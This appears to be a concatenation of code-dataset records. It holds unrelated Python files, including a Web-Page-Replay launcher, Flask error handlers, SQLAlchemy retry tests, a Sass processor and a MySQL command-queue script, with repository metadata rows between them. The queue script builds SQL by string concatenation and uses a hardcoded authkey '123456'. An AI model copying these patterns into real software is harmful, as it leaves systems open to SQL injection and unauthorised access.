if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
return open(self.log_name, 'w')
def StartServer(self):
cmd_line = [self.wpr_py]
cmd_line.extend(self.wpr_options)
# TODO(slamm): Support choosing archive on-the-fly.
cmd_line.append(self.archive_path)
self.log_fh = self._OpenLogFile()
logging.debug('Starting Web-Page-Replay: %s', cmd_line)
self.proxy_process = subprocess.Popen(
cmd_line, stdout=self.log_fh, stderr=subprocess.STDOUT)
if not self.IsStarted():
raise ReplayNotStartedError(
'Web Page Replay failed to start. See the log file: ' + self.log_name)
def IsStarted(self):
"""Checks to see if the server is up and running."""
for _ in range(5):
if self.proxy_process.poll() is not None:
# The process has exited.
break
try:
up_url = '%s://localhost:%s/web-page-replay-generate-200'
http_up_url = up_url % ('http', HTTP_PORT)
https_up_url = up_url % ('https', HTTPS_PORT)
if (200 == urllib.urlopen(http_up_url, None, {}).getcode() and
200 == urllib.urlopen(https_up_url, None, {}).getcode()):
return True
except IOError:
time.sleep(1)
return False
def StopServer(self):
if self.proxy_process:
logging.debug('Stopping Web-Page-Replay')
# Use a SIGINT here so that it can do graceful cleanup.
# Otherwise, we will leave subprocesses hanging.
self.proxy_process.send_signal(signal.SIGINT)
self.proxy_process.wait()
if self.log_fh:
self.log_fh.close()
class ChromiumPaths(object):
"""Collect all the path handling together."""
PATHS = {
'archives': 'src/data/page_cycler/webpagereplay',
'.wpr': 'src/data/page_cycler/webpagereplay/{TEST_NAME}.wpr',
'.wpr_alt': 'src/tools/page_cycler/webpagereplay/tests/{TEST_NAME}.wpr',
'start.html': 'src/tools/page_cycler/webpagereplay/start.html',
'extension': 'src/tools/page_cycler/webpagereplay/extension',
'replay': 'src/third_party/webpagereplay',
'logs': 'src/webpagereplay_logs/{TEST_EXE_NAME}',
}
def __init__(self, **replacements):
"""Initialize ChromiumPaths.
Args:
replacements: a dict of format replacements for PATHS such as
{'TEST_NAME': '2012Q2', 'TEST_EXE_NAME': 'performance_ui_tests'}.
"""
module_dir = os.path.dirname(__file__)
self.base_dir = os.path.abspath(os.path.join(
module_dir, '..', '..', '..', '..'))
self.replacements = replacements
def __getitem__(self, key):
path_parts = [x.format(**self.replacements)
for x in self.PATHS[key].split('/')]
return os.path.join(self.base_dir, *path_parts)
def LaunchChromium(chrome_exe, chromium_paths, test_name,
is_dns_forwarded, use_auto):
"""Launch chromium to run WPR-backed page cycler tests.
These options need to be kept in sync with
src/chrome/test/perf/page_cycler_test.cc.
"""
REPLAY_HOST='127.0.0.1'
user_data_dir = USER_DATA_DIR.format(**{'TEMP': tempfile.gettempdir()})
chromium_args = [
chrome_exe,
'--load-extension=%s' % chromium_paths['extension'],
'--testing-fixed-http-port=%s' % HTTP_PORT,
'--testing-fixed-https-port=%s' % HTTPS_PORT,
'--disable-background-networking',
'--enable-experimental-extension-apis',
'--enable-file-cookies',
'--enable-logging',
'--log-level=0',
'--enable-stats-table',
'--enable-benchmarking',
'--ignore-certificate-errors',
'--metrics-recording-only',
'--activate-on-launch',
'--no-first-run',
'--no-proxy-server',
'--user-data-dir=%s' % user_data_dir,
'--window-size=1280,1024',
]
if not is_dns_forwarded:
chromium_args.append('--host-resolver-rules=MAP * %s' % REPLAY_HOST)
start_url = 'file://%s?test=%s' % (chromium_paths['start.html'], test_name)
if use_auto:
start_url += '&auto=1'
chromium_args.append(start_url)
if os.path.exists(user_data_dir):
shutil.rmtree(user_data_dir)
os.makedirs(user_data_dir)
try:
logging.debug('Starting Chrome: %s', chromium_args)
retval = subprocess.call(chromium_args)
finally:
shutil.rmtree(user_data_dir)
def main():
log_level = logging.DEBUG
logging.basicConfig(level=log_level,
format='%(asctime)s %(filename)s:%(lineno)-3d'
' %(levelname)s %(message)s',
datefmt='%y%m%d %H:%M:%S')
option_parser = optparse.OptionParser(usage=USAGE)
option_parser.add_option(
'', '--auto', action='store_true', default=False,
help='Start test automatically.')
option_parser.add_option(
'', '--replay-dir', default=None,
help='Run replay from this directory instead of tools/build/third_party.')
replay_group = optparse.OptionGroup(option_parser,
'Options for replay.py', 'These options are passed through to replay.py.')
replay_group.add_option(
'', '--record', action='store_true', default=False,
help='Record a new WPR archive.')
replay_group.add_option( # use default that does not require sudo
'', '--dns_forwarding', default=False, action='store_true',
help='Forward DNS requests to the local replay server.')
option_parser.add_option_group(replay_group)
options, args = option_parser.parse_args()
if len(args) != 2:
option_parser.error('Need CHROME_EXE and TEST_NAME.')
return 1
chrome_exe, test_name = args
if not os.path.exists(chrome_exe):
print >>sys.stderr, 'Chrome path does not exist:', chrome_exe
return 1
chromium_paths = ChromiumPaths(
TEST_NAME=test_name,
TEST_EXE_NAME='webpagereplay_utils')
if os.path.exists(chromium_paths['archives']):
archive_path = chromium_paths['.wpr']
else:
archive_path = chromium_paths['.wpr_alt']
if not os.path.exists(archive_path) and not options.record:
print >>sys.stderr, 'Archive does not exist:', archive_path
return 1
replay_options = []
if options.record:
replay_options.append('--record')
if not options.dns_forwarding:
replay_options.append('--no-dns_forwarding')
if options.replay_dir:
replay_dir = options.replay_dir
else:
replay_dir = chromium_paths['replay']
wpr = ReplayLauncher(replay_dir, archive_path,
chromium_paths['logs'], replay_options)
try:
wpr.StartServer()
LaunchChromium(chrome_exe, chromium_paths, test_name,
options.dns_forwarding, options.auto)
finally:
wpr.StopServer()
return 0
if '__main__' == __name__:
sys.exit(main())
| 33.462963
| 80
| 0.672385
|
a1cbc0ab88172b8df0037e5e1d507404e620e551
| 178
|
py
|
Python
|
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
def common_elements(set_1, set_2):
result = []
for element in set_1:
if element in set_2:
result.append(element)
return result
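# For genuine set inputs the loop above is equivalent (up to ordering) to
# list(set_1 & set_2).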
| 22.25
| 34
| 0.623596
|
d26e80d87b36f85e32156689eb46739d78d42199
| 7,339
|
py
|
Python
|
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | null | null | null |
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | null | null | null |
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | 1
|
2021-04-15T17:35:57.000Z
|
2021-04-15T17:35:57.000Z
|
"""Test SQL transaction conflict resolution."""
import threading
import time
import pytest
from sqlalchemy import Column
from sqlalchemy import Numeric
from sqlalchemy import Integer
import transaction
from websauna.system.model.meta import create_dbsession, Base
from websauna.system.model.retry import retryable, CannotRetryAnymore, is_retryable
_test_model = None
def get_test_model():
global _test_model
if _test_model:
return _test_model
class TestModel(Base):
"""A sample SQLAlchemy model to demostrate db conflicts. """
__tablename__ = "test_model"
#: Running counter used in foreign key references
id = Column(Integer, primary_key=True)
#: The total balance of this wallet in the minimum unit of cryptocurrency
#: NOTE: accuracy checked for Bitcoin only
balance = Column(Numeric(21, 8))
_test_model = TestModel
return _test_model
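# The test model is created lazily and cached in _test_model so that repeated
# calls do not try to declare the same SQLAlchemy table twice.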
class ConflictThread(threading.Thread):
"""Launch two of these and they should cause database conflict."""
def __init__(self, session_factory):
self.session_factory = session_factory
self.failure = None
threading.Thread.__init__(self)
def run(self):
txn = None
try:
dbsession = self.session_factory()
txn = dbsession.transaction_manager.begin()
TestModel = get_test_model()
# Both threads modify the same wallet simultaneously
w = dbsession.query(TestModel).get(1)
w.balance += 1
            # Let the other session start its own transaction
time.sleep(1)
dbsession.transaction_manager.commit()
except Exception as e:
self.failure = (txn, dbsession, e)
class ConflictResolverThread(threading.Thread):
"""Launch two of these and they should cause database conflict and then retryable resolves it."""
def __init__(self, dbsession_factory):
self.dbsession_factory = dbsession_factory
self.failure = None
threading.Thread.__init__(self)
self.success_count = 0
self.failure_count = 0
self.retry_count = 0
def run(self):
dbsession = self.dbsession_factory()
# Execute the conflict sensitive code inside a managed transaction
@retryable(tm=dbsession.transaction_manager)
def myfunc():
TestModel = get_test_model()
# Both threads modify the same wallet simultaneously
w = dbsession.query(TestModel).get(1)
w.balance += 1
            # Let the other session start its own transaction
time.sleep(1)
try:
myfunc()
self.success_count += 1
except Exception as e:
self.failure = e
self.failure_count += 1
# See retryable()
self.retry_count = dbsession.transaction_manager.latest_retry_count
@pytest.fixture
def test_instance(dbsession):
TestModel = get_test_model()
Base.metadata.create_all(tables=[TestModel.__table__], bind=dbsession.get_bind())
with dbsession.transaction_manager:
        # Create a wallet with a balance of 10
w = dbsession.query(TestModel).get(1)
if not w:
w = TestModel()
dbsession.add(w)
w.balance = 10
@pytest.fixture
def dbsession_factory(test_request):
def factory():
dbsession = create_dbsession(test_request.registry, manager=None)
        # Retry each transaction at most once (two attempts in total)
dbsession.transaction_manager.retry_attempt_count = 2
return dbsession
return factory
def test_sql_transaction_conflict(test_instance, dbsession_factory):
"""Run database to a transaction conflict and see what exception it spits out, and make sure we know this is the exception we expect."""
t1 = ConflictThread(dbsession_factory)
t2 = ConflictThread(dbsession_factory)
t1.start()
t2.start()
t1.join()
t2.join()
# Either thread spits out:
# sqlalchemy.exc.OperationalError: (TransactionRollbackError) could not serialize access due to concurrent update
# 'UPDATE btc_wallet SET updated_at=%(updated_at)s, balance=%(balance)s WHERE btc_wallet.id = %(btc_wallet_id)s' {'btc_wallet_id': 1, 'balance': Decimal('11.00000000'), 'updated_at': datetime.datetime(2014, 12, 18, 1, 53, 58, 583219)}
failure = t1.failure or t2.failure or None
assert failure is not None
txn, dbsession, exc = failure
error_type = exc.__class__
error = exc
assert txn.status == "Commit failed"
assert is_retryable(txn, error) is True
def test_conflict_resolved(test_instance, dbsession_factory, dbsession):
"""Use conflict resolver to resolve conflict between two transactions and see code retry is correctly run."""
TestModel = get_test_model()
t1 = ConflictResolverThread(dbsession_factory)
t2 = ConflictResolverThread(dbsession_factory)
t1.start()
t2.start()
t1.join()
t2.join()
# sqlalchemy.exc.OperationalError: (TransactionRollbackError) could not serialize access due to concurrent update
# 'UPDATE btc_wallet SET updated_at=%(updated_at)s, balance=%(balance)s WHERE btc_wallet.id = %(btc_wallet_id)s' {'btc_wallet_id': 1, 'balance': Decimal('11.00000000'), 'updated_at': datetime.datetime(2014, 12, 18, 1, 53, 58, 583219)}
failure = t1.failure or t2.failure or None
assert failure is None # Both threads pass
# Check both increments came through
with transaction.manager:
w = dbsession.query(TestModel).get(1)
assert w.balance == 12
success = sum([t1.success_count, t2.success_count])
retries = sum([t1.retry_count, t2.retry_count])
errors = sum([t1.failure_count, t2.failure_count])
assert success == 2
assert retries == 1 # At least one thread needs to retry
assert errors == 0
def test_conflict_some_other_exception(dbsession):
"""See that unknown exceptions are correctly reraised by managed_transaction."""
@retryable(tm=dbsession.transaction_manager)
def do_stuff():
raise ValueError("Unknown exception")
with pytest.raises(ValueError):
do_stuff()
def test_give_up(test_instance, dbsession_factory, dbsession):
"""See that the conflict resolver gives up after using given number of attempts to replay transactions."""
    # The resolver allows at most one retry:
    # first t1 succeeds while t2 and t3 clash;
    # then t2 succeeds and t3 retries, but it has run out of retry attempts.
t1 = ConflictResolverThread(dbsession_factory)
t2 = ConflictResolverThread(dbsession_factory)
t3 = ConflictResolverThread(dbsession_factory)
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
failure = t1.failure or t2.failure or t3.failure or None
assert isinstance(failure, CannotRetryAnymore)
success = sum([t1.success_count, t2.success_count, t3.success_count])
retries = sum([t1.retry_count, t2.retry_count, t3.retry_count])
errors = sum([t1.failure_count, t2.failure_count, t3.failure_count])
assert success == 2
assert retries == 2
assert errors == 1
# Check 2 increments came through
TestModel = get_test_model()
with transaction.manager:
w = dbsession.query(TestModel).get(1)
assert w.balance == 12
| 30.077869
| 239
| 0.682518
|
2373eb11c6668613c49c0919415f654f42a85861
| 1,807
|
py
|
Python
|
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | 1
|
2021-12-15T09:39:57.000Z
|
2021-12-15T09:39:57.000Z
|
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | null | null | null |
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, render_template
errors = Blueprint('errors', __name__)
@errors.app_errorhandler(404)
def error_404(error):
error_popper = "Oh no!"
error_code = "404"
error_img = error_code
error_message = "Deadend! Comeback to the homepage and continue where you left off"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 404
@errors.app_errorhandler(403)
def error_403(error):
error_popper = "Forbidden!"
error_code = "403"
error_img = error_code
error_message = "You stumbled across something you weren’t meant to access. Comeback to the homepage"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 403
@errors.app_errorhandler(405)
def error_405(error):
error_popper = "Woops!"
error_code = "405"
error_img = "403"
error_message = "You stumbled across something you weren’t meant to access. Comeback to the homepage"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 405
@errors.app_errorhandler(500)
def error_500(error):
error_popper = "Woops!"
error_code = "500"
error_img = error_code
error_message = "There’s a bug in the system! Comeback to the homepage to continue where you left off"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 500
| 28.234375
| 106
| 0.68788
|
6a1f5c2d5983f7f1850f316333009599ea607db8
| 2,026
|
py
|
Python
|
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.support.wait import WebDriverWait
from .locators import BasePageLocators
class BasePage:
def __init__(self, browser, url, timeout=10):
self.browser = browser
self.url = url
self.browser.implicitly_wait(timeout)
def go_to_login_page(self):
link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)
link.click()
def go_to_cart_page(self):
link = self.browser.find_element(*BasePageLocators.VIEW_CART_LINK)
link.click()
def should_be_login_link(self):
assert self.is_element_present(*BasePageLocators.LOGIN_LINK), \
"Login link is not presented"
def should_be_cart_link(self):
assert self.is_element_present(*BasePageLocators.VIEW_CART_LINK), \
"Cart link is not presented"
def should_be_authorized_user(self):
assert self.is_element_present(*BasePageLocators.USER_ICON), \
"User icon is not presented," " probably unauthorised user"
def open(self):
self.browser.get(self.url)
def find(self, how, what):
return self.browser.find_element(how, what)
def is_element_present(self, how, what):
try:
self.browser.find_element(how, what)
except NoSuchElementException:
return False
return True
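    # Waits up to `timeout` seconds for the element to appear and returns True
    # only if it never shows up (i.e. the element is absent from the page).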
def is_not_element_present(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))
except TimeoutException:
return True
return False
def is_disappeared(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout, 1, TimeoutException). \
until_not(EC.presence_of_element_located((how, what)))
except TimeoutException:
return False
return True
| 32.677419
| 99
| 0.67769
|
aa3a991d02defe69c352599f893a22c0c4e7afc5
| 1,341
|
py
|
Python
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 422
|
2018-12-03T19:47:06.000Z
|
2022-03-29T13:18:09.000Z
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 60
|
2019-02-11T02:43:52.000Z
|
2022-02-20T07:24:40.000Z
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 121
|
2018-12-29T03:40:40.000Z
|
2022-03-03T11:33:23.000Z
|
# coding=utf-8
# Copyright 2017-2020 The THUMT Authors
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import torch
class PositionalEmbedding(torch.nn.Module):
def __init__(self):
super(PositionalEmbedding, self).__init__()
def forward(self, inputs):
if inputs.dim() != 3:
raise ValueError("The rank of input must be 3.")
length = inputs.shape[1]
channels = inputs.shape[2]
half_dim = channels // 2
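        # Standard Transformer sinusoidal encoding: the first half of the
        # channels holds sin(pos / 10000^(i / (half_dim - 1))) terms and the
        # second half the matching cos terms; any odd channel is zero-padded.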
positions = torch.arange(length, dtype=inputs.dtype,
device=inputs.device)
dimensions = torch.arange(half_dim, dtype=inputs.dtype,
device=inputs.device)
scale = math.log(10000.0) / float(half_dim - 1)
dimensions.mul_(-scale).exp_()
scaled_time = positions.unsqueeze(1) * dimensions.unsqueeze(0)
signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)],
dim=1)
if channels % 2 == 1:
pad = torch.zeros([signal.shape[0], 1], dtype=inputs.dtype,
device=inputs.device)
signal = torch.cat([signal, pad], axis=1)
return inputs + torch.reshape(signal, [1, -1, channels]).to(inputs)
| 31.186047
| 76
| 0.598807
|
cfb9bd2c8b4bb5c927f86f28d9d5a2588fb52139
| 92
|
py
|
Python
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | 2
|
2017-04-06T12:26:11.000Z
|
2018-11-05T19:17:15.000Z
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | 9
|
2016-09-28T10:19:10.000Z
|
2017-02-24T17:58:43.000Z
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | null | null | null |
def migrate_user(self):
"""
Migrate to latest schema version.
"""
return
| 10.222222
| 37
| 0.576087
|
6dd9254a4fa6c53a449d5ab827e96ed56bdaeda8
| 5,112
|
py
|
Python
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 43
|
2015-04-24T05:30:04.000Z
|
2022-02-03T17:47:35.000Z
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 54
|
2015-01-03T01:58:44.000Z
|
2021-05-06T21:56:26.000Z
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 8
|
2015-05-10T01:50:46.000Z
|
2016-12-26T20:53:15.000Z
|
import os
import os.path
import json
import hashlib
import logging
import platform
import subprocess
from piecrust.processing.base import SimpleFileProcessor, FORCE_BUILD
logger = logging.getLogger(__name__)
class SassProcessor(SimpleFileProcessor):
PROCESSOR_NAME = 'sass'
def __init__(self):
super(SassProcessor, self).__init__(
extensions={'scss': 'css', 'sass': 'css'})
self._conf = None
self._map_dir = None
def initialize(self, app):
super(SassProcessor, self).initialize(app)
def onPipelineStart(self, ctx):
super(SassProcessor, self).onPipelineStart(ctx)
self._map_dir = os.path.join(ctx.tmp_dir, 'sass')
if ctx.is_main_process:
if not os.path.isdir(self._map_dir):
os.makedirs(self._map_dir)
# Ignore include-only Sass files.
ctx.ignore_patterns += ['_*.scss', '_*.sass']
def getDependencies(self, path):
if _is_include_only(path):
raise Exception("Include only Sass files should be ignored!")
map_path = self._getMapPath(path)
try:
with open(map_path, 'r') as f:
dep_map = json.load(f)
except IOError:
# Map file not found... rebuild.
logger.debug("No map file found for Sass file '%s' at '%s'. "
"Rebuilding." % (path, map_path))
return FORCE_BUILD
if dep_map.get('version') != 3:
logger.warning("Unknown Sass map version. Rebuilding.")
return FORCE_BUILD
sources = dep_map.get('sources', [])
deps = list(map(_clean_scheme, sources))
return deps
def _doProcess(self, in_path, out_path):
self._ensureInitialized()
if _is_include_only(in_path):
raise Exception("Include only Sass files should be ignored!")
sourcemap = 'none'
if self.app.cache.enabled:
sourcemap = 'file'
args = [self._conf['bin'],
'--sourcemap=%s' % sourcemap,
'--style', self._conf['style']]
cache_dir = self._conf['cache_dir']
if cache_dir:
args += ['--cache-location', cache_dir]
else:
args += ['--no-cache']
for lp in self._conf['load_paths']:
args += ['-I', lp]
args += self._conf['options']
args += [in_path, out_path]
logger.debug("Processing Sass file: %s" % args)
try:
retcode = subprocess.call(args)
except FileNotFoundError as ex:
logger.error("Tried running Sass processor with command: %s" %
args)
raise Exception("Error running Sass processor. "
"Did you install it?") from ex
# The sourcemap is generated next to the CSS file... there doesn't
# seem to be any option to override that, sadly... so we need to move
# it to the cache directory.
if self.app.cache.enabled:
src_map_file = out_path + '.map'
dst_map_file = self._getMapPath(in_path)
if os.path.exists(dst_map_file):
os.remove(dst_map_file)
os.rename(src_map_file, dst_map_file)
if retcode != 0:
raise Exception("Error occured in Sass compiler. Please check "
"log messages above for more information.")
return True
def _ensureInitialized(self):
if self._conf is not None:
return
bin_name = 'scss'
if platform.system() == 'Windows':
bin_name += '.cmd'
self._conf = self.app.config.get('sass') or {}
self._conf.setdefault('bin', bin_name)
self._conf.setdefault('style', 'nested')
self._conf.setdefault('load_paths', [])
if not isinstance(self._conf['load_paths'], list):
raise Exception("The `sass/load_paths` configuration setting "
"must be an array of paths.")
self._conf.setdefault('options', [])
if not isinstance(self._conf['options'], list):
raise Exception("The `sass/options` configuration setting "
"must be an array of arguments.")
app_root_dir = self.app.root_dir
load_paths = list(self._conf['load_paths'])
for i, lp in enumerate(load_paths):
self._conf['load_paths'][i] = os.path.join(app_root_dir, lp)
cache_dir = None
if self.app.cache.enabled:
cache_dir = os.path.join(self.app.cache_dir, 'sass')
self._conf.setdefault('cache_dir', cache_dir)
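    # The map file name below combines the source base name with an MD5 of the
    # full path so that files with the same name in different directories do
    # not collide in the shared Sass map cache.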
def _getMapPath(self, path):
map_name = "%s_%s.map" % (
os.path.basename(path),
hashlib.md5(path.encode('utf8')).hexdigest())
map_path = os.path.join(self._map_dir, map_name)
return map_path
def _clean_scheme(p):
if p.startswith('file://'):
return p[7:]
return p
def _is_include_only(path):
name = os.path.basename(path)
return len(name) > 0 and name[0] == '_'
| 32.35443
| 77
| 0.57766
|
fe0e009199fba49fbbacf67cd7fa2d6503af0dfa
| 3,461
|
py
|
Python
|
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | null | null | null |
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | null | null | null |
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | 1
|
2018-12-02T19:44:14.000Z
|
2018-12-02T19:44:14.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Ver 18 - 15 November 2017 -
import time
import string
import sys
import mysql.connector
from mysql.connector import errorcode, pooling
from db import *
import datetime
#from threading import Thread
import multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.managers import SyncManager
HOST = ''
PORT0 = 5011
PORT1 = 5012
PORT2 = 5013
PORT3 = 5014
PORT4 = 5015
PORT5 = 5016
AUTHKEY = str("123456").encode("utf-8")
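# PORT0-PORT5 are assumed to correspond to the six shared queues served by the
# queue manager processes: command in, command out, SQL, response, query and
# query result (see the qIn/qOut/qSql/qResp/qQuery/qResult clients below).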
def output(o, x):
print(str(str(o) + " " + str(datetime.datetime.now().time())[:8]) + " "+ str(x))
sys.stdout.flush()
def printDBError(x, e):
output(x, "Error: " + str(e)) # errno, sqlstate, msg values
# -- DB Connection ---------------------------
try:
db = mysql.connector.connect(**config)
except mysql.connector.Error as err:
    if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
        output("P_CMD_IN", "Something is wrong with your user name or password")
    elif err.errno == errorcode.ER_BAD_DB_ERROR:
        output("P_CMD_IN", "Database does not exist")
    else:
        output("P_CMD_IN", err)
else:
output("P_CMD_IN","Start procedure")
db.commit()
# -- END DB Connection ---------------------------
#-----------------------------
# Global Variable declaration
#-----------------------------
#-----------------------------
# End Global Variable declaration
#-----------------------------
#-- function to extract integer from strings
def parseint(string):
return int(''.join([x for x in string if x.isdigit()]))
def log(t, m):
#curLog = db.cursor()
sql = "insert into tblog (type,msg) VALUES (%s, %s)"
#try:
#curLog.execute(sql, (t,m))
#db.commit()
#curLog.close()
#except:
#raise
#curLog.close()
def printTime():
now = datetime.datetime.now()
print(now.strftime("%H %M %S %f"))
def execSQL(qSQL):
cur = db.cursor()
while True:
#try:
if not qSQL.empty():
sql = str(qSQL.get())
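            # The first character of the queued string selects the target table:
            # '0' updates the single pending row in tbqueue, anything else
            # (e.g. '9') inserts a new row into tbqueuecommand.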
if sql[:1] == "0":
sql = sql[1:]
inssql = "UPDATE tbqueue SET timekey = millis(), code = '" + sql + "' WHERE id = 1"
else: # = 9
sql = sql[1:]
print("comando")
inssql = "INSERT INTO tbqueuecommand (timekey, code) VALUES (millis(), '" + sql + "')"
try:
db.start_transaction(False, None, False)
cur.execute(inssql)
db.commit()
except mysql.connector.Error as e:
printDBError("P_CMD_IN", e)
time.sleep(0.2)
def QueueServerClient(HOST, PORT, AUTHKEY):
class QueueManager(SyncManager):
pass
QueueManager.register('get_queue')
QueueManager.register('get_name')
QueueManager.register('get_description')
manager = QueueManager(address = (HOST, PORT), authkey = AUTHKEY)
manager.connect() # This starts the connected client
return manager
#------- Main section ----------------------------#
#------- Run once --------------------------------#
# create three connected managers
qmIn = QueueServerClient(HOST, PORT0, AUTHKEY)
qmOut = QueueServerClient(HOST, PORT1, AUTHKEY)
qmSql = QueueServerClient(HOST, PORT2, AUTHKEY)
qmResp = QueueServerClient(HOST, PORT3, AUTHKEY)
qmQry = QueueServerClient(HOST, PORT4, AUTHKEY)
qmRslt = QueueServerClient(HOST, PORT5, AUTHKEY)
# Get the queue objects from the clients
qIn = qmIn.get_queue()
qOut = qmOut.get_queue()
qSql = qmSql.get_queue()
qResp = qmResp.get_queue()
qQuery = qmQry.get_queue()
qResult = qmRslt.get_queue()
#------- End run once -------------------------#
log("I", "Start main loop")
execSQL(qSql)
| 25.448529
| 90
| 0.619474
|
6a4c60767ce8a0f55eb115ac93df45d0238e8308
| 79
|
py
|
Python
|
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
def magic_calculation(a, b):
return (98 + a ** b)
| 13.166667
| 28
| 0.56962
|
97bb9a66440da241618b67d89d2a9195af6ebf52
| 1,134
|
py
|
Python
|
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | null | null | null |
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | 7
|
2021-07-23T14:08:32.000Z
|
2021-07-25T14:56:35.000Z
|
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | 1
|
2022-02-04T21:36:34.000Z
|
2022-02-04T21:36:34.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Extracts distinct referenced topics from text and returns a CSV.
"""
import re
import pandas as pd
# Create xom-topics.csv
cmd = "xsltproc xom-topics.xsl xom-all-flat-mod-pnums.xml > xom-topics.csv"
import os
os.system(cmd)
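# The XSLT step is expected to emit ';'-separated records of the form
# count|text_seg|topic_name, which are flattened and normalised below.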
bigline = ''
with open('xom-topics.csv', 'r') as xom:
bigline = ' '.join([line.strip() for line in xom.readlines()])
bigline = re.sub(r'\s+', ' ', bigline)
#bigline = re.sub(r'\s*-\s*', '', bigline)
data = []
for line in bigline.split(';'):
data.append(line.split('|'))
df = pd.DataFrame(data, columns=['count', 'text_seg', 'topic_name'])
df['text_seg'] = df.text_seg.str.replace(' –', '')
df['text_seg'] = df.text_seg.str.strip()
df = df.sort_values(['topic_name','text_seg'])
df[['topic_name', 'text_seg', 'count']].to_csv('xom-topic-index.csv', sep='|', index=False)
df2 = df.groupby(['topic_name', 'text_seg']).count()
